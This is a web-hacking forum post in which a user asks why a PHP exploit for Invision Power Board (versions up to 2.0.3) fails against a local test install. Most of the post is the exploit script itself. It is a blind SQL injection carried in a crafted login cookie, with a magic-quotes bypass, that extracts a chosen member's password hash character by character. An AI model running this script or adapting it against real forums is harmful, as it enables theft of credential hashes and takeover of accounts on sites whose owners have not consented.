Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

IPB exploit - can't get it work

  1. Home
  2. Forum
  3. Web hacking
  4. IPB exploit - can't get it work

ghost's Avatar

ghost

0 0

I fould this exploit for Invision power board. It shoud work till 2.0.3 version. So, I install test forum (version 2.0.3) on my localhost but I can't get it work.

  • First of all does anybody get it work??
  • Second I try to use this script (Of cause I correct server and file variable), didn't work I get just 0s for result.
  • Is there maybe a problem with user id (I have 2 users on my test forum, I change variable id to 1), didn't work.

Any idea?

/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
  $idx = 0;
  $found = false;

  while( !($found) ) {
    $letter = substr($hex, $idx, 1);
  
    /* %2527 translates to %27, which gets past magic quotes.This is translated to ' by urldecode. */
    $cookie ="member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
    $cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
  
    /* Query is in effect: SELECT * FROM ibf_members
        WHERE id=$id AND password='$pass' ORid=$target
        HAVING id=$target AND MID(`password`,$i,1)='$letter' */
  
    $header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie);
    if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) {
      echo $i . ": " . $letter . "\n";
      $found = true;
  
      $hash .= $letter;
    } else {
      $idx++;
    }
  }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
  $ip = gethostbyname($server);
  $fp = fsockopen($ip, $port);

  if (!$fp) {
      return "Unknown";
  } else {
    $com = "HEAD $file HTTP/1.1\r\n";
    $com .= "Host: $server:$port\r\n";
    $com .= "Cookie: $cookie\r\n";
    $com .= "Connection: close\r\n";
    $com .= "\r\n";

    fputs($fp, $com);

    do {
        $header.= fread($fp, 512);
    } while( !preg_match('/\r\n\r\n$/',$header) );
  }

  return $header;
}
?>```